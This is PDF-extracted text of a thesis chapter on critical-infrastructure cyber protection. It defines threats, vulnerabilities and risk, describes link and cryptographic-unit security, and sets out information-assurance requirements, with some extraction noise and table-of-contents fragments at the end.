• Functional requirement definition: once the communication architecture has been identified and properly characterized, functional requirements of the communi-cation architecture, specifying what the solution must do, must be defined from the Information Assurance point of view. This phase has been characterized by a deep analysis of the literature on vulnerabilities and cyber threats at first and then on Information assurance in Critical Infrastructure context. The output is given by the list of functional requirements in terms of: confidentiality, authentication, integrity, availability, and non-repudiation. In order to clearly understand the prob-lem domain before devising a solution, functional requirements are defined in a way that makes them independent of a particular technology implementation. • Non-functional requirements definition: once the functional requirements have

been defined, the last phase of the analysis has concerns the definition of non-functional requirements, which refer to additional technical and operational re-quirements for the solution to be implemented and supported. Hence, the technol-ogy platform required to support the foreseen solution is specified.

2.4.3 Threats, Vulnerabilities and Risks

Below is a list of definitions used to describe the risk analysis of a generic Critical Infrastructure:

• Threat: a potential cause of an incident that may result in harm to a system or organization. A threat may be defined by its source, motivation or result, it may be deliberate or accidental, violent or surreptitious, Threat: a potential cause of an incident that may result in harm to a system or organization. A threat may be defined by its source, motivation or result, it may be deliberate or accidental, violent or surreptitious, external or internal.

• Vulnerability: a weakness of an asset (resource) or a group of assets that can be exploited by one or more threats. Examples of different types of vulnerabilities are: Physical vulnerabilities, Natural vulnerabilities, Hardware/software vulner-abilities, Media vulnerabilities (e.g., stolen/damaged disk/tapes), Emanation vul-nerabilities (e.g., due to radiation), Communication vulvul-nerabilities, and Human vulnerabilities

(33)

2.4. Critical Infrastructure reference architecture

Figure 2.2: Relationship among risk, threat, vulnerability and Consequences.

• Risk: potential for loss, damage, or destruction of an asset as a result of a threat exploiting a vulnerability. Strongly related to risk there exist two main concepts: • Risk management: the process of identifying, controlling and minimizing or

elim-inating security risks that may affect information systems, for an acceptable cost; assessment of risk and the implementation of procedures and practices designed to control the level of risk

• Risk assessment: assessment of threats to, impact on and vulnerabilities of in-formation and inin-formation processing facilities and the likelihood of their occur-rence; identification of the risk, analysis of the risk in terms of performance, cost, and other quality factors; risk prioritization in terms of exposure and leverage • Cyber Threat Actor: entities that would knowingly seek to manifest a threat

As an example, to clarify such elements, let us consider a system that allows weak passwords:

• Vulnerability: password is vulnernary or exhaustive (brute-force) key attacks • Threat: an intruder can exploit the password weakness to break into the system • Risk: the resources within the system are prone for illegal access/modify/damage

by the intruder.

It is important to note that, there exist a relation among threats, vulnerabilities, and risks. Such a relation roughly says (Fig. 2.2 ) that the level of risk is given by the product of the capacity level of threat and the importance of the vulnerability. It is clear that in the described context, given that the threats can be represented by very highly skilled hackers also “small” vulnerabilities can lead to very high levels of risks.

More in general, the risk is strongly related to the types of damages that can be produced by exploiting a given vulnerability. At a high level the following type of damages can be defined:

• Interruption: some specific services and/or resources are either destroyed or made unavailable (e.g., a communication link become unusable become of either a phys-ical damage or a cyber-attack and information cannot be exchanged over that link). • Interception: an unauthorized party is able to snoop or to get access to a resource (e.g., an unauthorized party is able to intercept the information transmitted over a communication link).

(34)

• Modification: an unauthorized party is able to modify a resource (e.g., data stored in a database).

• Fabrication: an unauthorized party is able to insert a fake asset/resource (e.g., some fake data are inserted in a database).

Finally, to conclude the quick overview on the basics of threats and vulnerabilities, it is worth describing the different components of a threat:

• Threat agent: the actor of a threat, e.g. criminals, terrorists, subversive or secret groups, state sponsored, disgruntled employees, hackers, pressure groups, com-mercial groups. Usually classified in: i) Natural: fire, floods, power failure, earth quakes, etc. ii) Unintentional: insider, outsider: primarily non-hostile; iii) Inten-tional: Insider, outsider: hostile or non-hostile (curious).

• Capability: the tools used by the threat agent, e.g., software, technology, facili-ties, education and training, methods, books and manuals (note that this concept refers to a different context with respect to, and is not in contradiction with, what discussed in the previous section).

• Threat inhibitors: the elements that discourage the threat agent to carry out the threat, e.g, fear of capture, fear of failure, level of technical difficulty, cost of par-ticipation, sensitivity to public perception, law enforcement activity, target vulner-ability, target profile, public perception, and peer perception.

• Threat amplifiers: the elements that encourage the threat agent to carry out the threat, e.g., peer pressure, fame, access to information, changing high technology, deskilling through scripting, skills and education levels, law enforcement activity, target vulnerability, target profile, public perception, peer perception.

• Threat catalysts: the elements that somehow accelerate the execution of the threat, e.g., events, technology changes, personal circumstances.

• Threat agent motivators: the reasons that push the threat agent to carry out the threat, e.g., political, secular, personal gain, religion, power, terrorism, curiosity. In more detail, given that the scope of the Critical Infrastructure Cyber Protection is to focus on Information Assurance, the following will focus on the threats that are spe-cific to information systems, providing with a (non-exhaustive) list of potential threats: • Trojan Horse: these programs allows the remote access to the victim machine. They are characterized by two components: one runs as a server on the victim machine “opening a door” to the attacker and another one runs as a client on the attacker machine and is used to remotely access the target system.

• Spoofing: fooling other computer users to think that the source of their information is coming from a legitimate user.

• Sniffing/Eavesdropping: used by the attacker to observe the data transmitted over a communication channel.

• Scanning: used by the attacker to list all the open ports, services, and vulnerabili-ties present in the target system.

(35)

2.5. Communication Links Requirements

• Masquerading: A masquerade attack is an attack that uses a fake identity, such as a network identity, to gain unauthorized access to personal computer information through legitimate access identification.

• Man-in-the-Middle (MitM): used by the attacker to put herself transparently in the middle of a communication between other entities. It can be realized in both LAN (e.g., ARP poisoning) and in WAN (e.g., routing poising).

• Denial of Service: The main aim of this attack is to bring down the targeted system and make it unavailable for legitimate users. Still often being a very basic attack, people do not need high expertise to perform effective and potentially dangerous attacks.

• From the information assurance point of view, it is important to observe that all of these attacks must be considered somehow critical to the Infrastructure. Indeed, in the field almost all of the described threats are combined together to produce, what is called an Advanced Persistent Threat (APT), a very low intensity attack, in which the attacker is tasked to perform an attack and will use any technique, over long periods of time, until the target is finally accomplished.

2.5

Communication Links Requirements

Communication links are an important component of a communication network. Dif-ferent types of communication links bring difDif-ferent security implications regarding confidentiality and authenticity. In particular, attacking different link types requires different levels of sophistication in proportion of the attacker capabilities and motiva-tions. A possible classification of the so-called levels of sophistication is very complex to carry out as it should consider both the quantity, quality and effectiveness of the tools available as the complexity of the implementation in the protected context.

The confidentiality of data that is transmitted over a channel highly depends on the link type that is used for transmission. In the reference Critical Infrastructure com-munication network system in the capability requirements there are different types of local, static and dynamic links that rely either on wired or wireless channels. In par-ticular, the confidentiality of the transmission using wired channels is higher in most scenarios since physical access to the wires is required (even if not sufficient) in order to eavesdrop the communication. Many subsystems may be connected using wireless radio links that are more vulnerable against wiretapping and eavesdropping of the data transmission since all users that are in the coverage of the radio signal could receive the data.

2.5.2 Authenticity and Integrity

The authenticity as well as the integrity of the transmitted data is also highly depen-dent on the particular link type and the topology of the network. Threats on links that affect the authenticity and integrity of the data are in particular man-in-the-middle at-tacks, where the attacker controls and manipulates the data that is transmitted over the

(36)

network by spoofing the legitimate network users. For wired communication links, an attacker needs to have physical access to the network in order to manipulate data transmission. Generally speaking, getting physical access to wired networks (cables, ports,. . . ) is somehow harder than getting access to wireless networks, and requires more sophisticated mechanisms. This is particularly true considering the physically protected nature of the critical infrastructures considered.

2.5.3 Availability

Regarding the availability concept, the distinction between links and physical devices has a strong impact considering attacks aimed at making either of them (and not the actual information) unavailable to a legitimate user. From this point of view, attacks such DoS/DDoS (Denial of Services/Distributed Denial of Services), can be aimed for example at overwhelming the communication channel so that legitimate users do not have enough available resources to transmit their information. Taking into consider-ation this observconsider-ation, it is clear that making a wireless link unavailable to legitimate users is feasible both at the physical layer (e.g., jamming) and at the information layer (e.g., flooding the link with fake information), with the communication channel acces-sible by definition (i.e., the wireless link is a broadcast link) by the attacker. On the other hand, to compromise the physical layer availability of a wired link an attacker would need to have physical access the link (which is not said to be accessible to the attacker) and then either damage it or inject traffic on the link.

2.5.4 Non-Repudiation

Like authenticity and integrity, non-repudiation of the transmitted data is highly depen-dent on the particular link type as well as the network topology. So threats on links that affect the authenticity and integrity of the data, in particular man-in-the-middle attacks, likewise affects non-repudiation. Man-in-the-middle attacks happen when the attacker controls and/or manipulates the data that is transmitted over the network by spoofing the legitimate network users. Because attacks against wired communication links connote attacker to have physical access to the network in order to manipulate data transmission, they are less practical in principle. In fact, getting physical access to wired networks is more challenging than to wireless networks.

2.6

Physical Security Requirements of Chryptographic Units

The term physical cryptographical unit should be used to refer to the different physical devices which are part of the Critical Infrastructure network and store and/or process information which is protected by cryptographic means. The information stored in physical cryptographical units (such as encryption key, for example) might be leaked if unauthorized parties have physical access to it. For example, in a naïve cryptographical implementation, cryptographic key might be stored in cleartext in memory. If unautho-rized parties have access to the unit they can get access to the memory and obtain the keys. In a more realistic example the keys are not stored in cleartext, but might still leak to an attacker with physical access to the unit through a “side channel attack”, which might consist of measuring the encryption / decryption time or the power consumption during encryption/decryption.

(37)

2.7. Information Assurance Functional Requirements

The level of sophistication necessary to obtain physical access to the physical cryp-tographical units in different types of devices in the communication system (e.g. planes, satellites, surface,. . . ) can be of a very heterogeneous nature and complexity.

The probability of having physical access to units affects the confidentiality, authen-ticity and integrity of the data that is stored and/or processed inside the unit.

• Confidentiality: The confidentiality of the stored and processed data inside physi-cal units can be threatened if an attacker has virtual or physiphysi-cal access to the unit. In particular, stored data can leak if an attacker has physical access to the memory or storage. Such attacks are particularly dangerous as the amount of data that is stored or processed in physical units can be very large.

• Authenticity and Integrity: The authenticity and integrity of the stored and pro-cessed data plays a very important role in the Critical Infrastructure system. Threats, where physical devices are modified to transmit disturbed data (e.g. by spoofing sensors) are particularly dangerous as they may affect the whole system.

• Availability: In case of physical units, the availability concept can be seen as the fact the legitimate user must be able to access information stored in servers, when needed. From this point of view, as in the case of the availability for communi-cation links, there are both physical attacks to the servers (which should be very difficult to access by the attacker) and information level attack (i.e., overwhelming the server resources -access bandwidth or computational resources- to make them unable to process legitimate requests.

• Non-Repudiation: The concept of non-repudiation is particularly critical when it comes to transmitting commands and subsequently evaluating reliability. The considerations made for authentication are also valid here. Authentication and non-repudiation are two different sorts of concepts. Nevertheless, Authentication is a technical concept: it is solved through cryptography. On the other side, Non-repudiation is a legal concept: it is solved through legal and social processes, possibly aided by technology but above all on an administrative front.

2.7

Information Assurance Functional Requirements

Based on the threats and vulnerabilities from the previous section, requirements and possible security measures to ensure the confidentiality, authenticity, integrity, avail-ability and non-repudiation of the information within the Critical Infrastructure are identified.

2.7.1 Confidentiality, integrity, and authenticity

Starting from confidentiality, integrity, and authenticity (CIA), the following require-ments can be defined:

• Protection of the confidentiality of transmitted, processed and stored data: the confidentiality of the data within the system needs to be protected using long-term secure encryption and decryption mechanisms that cannot be broken by an attacker. According to the security level that must be enforce all or part of the data must be protected (security levels will be described later on in this report).

(38)

• Secure distribution, management and storage of keys: secret keys that are used for encryption and decryption need to be managed, distributed and stored in a secure way in order to prevent leakage of confidential information.

• Assurance of the authenticity and integrity of data: the authenticity and integrity of the data within the Critical Infrastructure network needs to be ensured to prevent spoofing and masquerading attacks. According to the security level that must be enforce all or part of the data must be protected.

2.7.2 Availability

High-level requirements can be defined that must be satisfied by the system and can be distinguished in five main categories:

• Detection and prevention of malicious events: it represents the main objective of a security system in general. It can be realised by properly designed firewalls and Intrusion Detection Systems (IDSs), to be implemented together with the previ-ously described security measures.

• Privacy preservation and data aggregation: the second goal of the system is to be able to manage the complexity and size of the data collected from the network and hosts. Encryption mechanisms are going to be enforced during the transport of the data between each element of the architecture, so as to guarantee the confidential-ity of the data as well as the privacy of the user generating such data.

• Attack redirection to honeynets: when an attack is detected, the system can react by redirecting the attack traffic to a honeynet. This objective is focused on the col-lection of attacker data while interacting inside the honeynet, producing precious information that can feed the detection algorithms with new malicious behaviour. • Self-protection: as the system itself is expected to be the target of attacks it has to be built to resist them and react in the case of a platform compromise. To do so the system may deploy probes at the actual elements of the platform.

• Continuous monitoring: even if it is probably a more general requirements, a last comment is to be said on the necessity of the security level of the communica-tion system to be continuously monitored (e.g, by performing security assessment and/or penetration testing) for actually verifying the effectiveness of the imple-mented security measures.

2.7.3 Non-repudiation

Finally, concerning non-repudiation, the requirements can be expressed as:

• Mutual guarantee: Confidence in an exchange of data or commands within the Critical Infrastructure is certified retrospectively by means of non-breakable di-gests of Digital Signature and suitable administrative measure. Obviously such re-quirements will be enforced only when/where needed (e.g., transmission of com-mands or official documents) and not all the time.

(39)

2.8. Information Assurance Non-Functional Requirements

2.8

Information Assurance Non-Functional Requirements

In order to ensure the confidentiality of the transmitted, stored and processed data, encryption and decryption mechanisms are required. In general, there are two variants of encryption schemes:

• Symmetric cryptosystem: for encryption and decryption the same secret key is used.

• Asymmetric cryposystem: for encryption and decryption a different key is used. Both methods are considered, a symmetric and an asymmetric cryptosystem, as possi-ble countermeasures to ensure the confidentiality of the data.

2.8.2 Availability

The assurance of availability is, in general, a more complex topic than the others since it does not exist a direct solution (like encryption for providing confidentiality). In the considered scenario, it can be assumed that guaranteeing the availability of the different resources must be accomplished by:

• Physically protecting the different elements of the communication infrastructure. • Hardening the devices.

• Guaranteeing that the devices are in a working state, by avoiding for example obsolescence of the devices.

• Preventing and detecting cyber threats, so as to be able to promptly stop them or mitigate their effect.

It is important to notice that, in preventing and detecting cyber-attacks, one must take care of both outsiders and insiders. This means that standard solutions based on “sim-ple” perimeter security are not enough to satisfy our requirements. Hence, a distributed system of devices (firewalls and probes) must be considered, which communicate to-wards a central entity, responsible for actually detecting attacks and generating alerts, as well as reacting to the attacks.

To achieve availability, three distinct elements should be combined together, so as to obtain an acceptable protection from the attacks: firewalls, IDSs, and honeynet. In Fig. 3.2 the proposed resulting security architecture is described. Referring to the general communication framework, the different typologies of communication networks (e.g., Command and Control, Surveillance) are represented by the blue-shadowed circles, where the different communication devices of each “sub-network” are located. As it can be seen, each network is provided with a firewall and a network probe (located at the network gateway) and some host probes, located at the different communication devices. All of the different networks are connected by means of secure channels via a backbone communication infrastructure, to which also the honeynet is connected. From a functional point of view, the different elements provide different services. The

C RITICAL I NFRASTRUCTUREPROTECTION M ITIGATIONAND I NCIDENT M ANAGEMENTMETHODOLOGIESFOR

M

ITIGATION AND

I

NCIDENT

M

ANAGEMENT

METHODOLOGIES FOR

C

RITICAL

INFRASTRUCTURE

PROTECTION

Acknowledgements

A

Ringraziamenti

R

Summary

S

Sommario

S

List of publications

Contents

CHAPTER

1

Introduction

CHAPTER

2

Background, Motivation and Requirements

2.1

2.2

2.3

2.4

2.5

2.6

2.7

2.8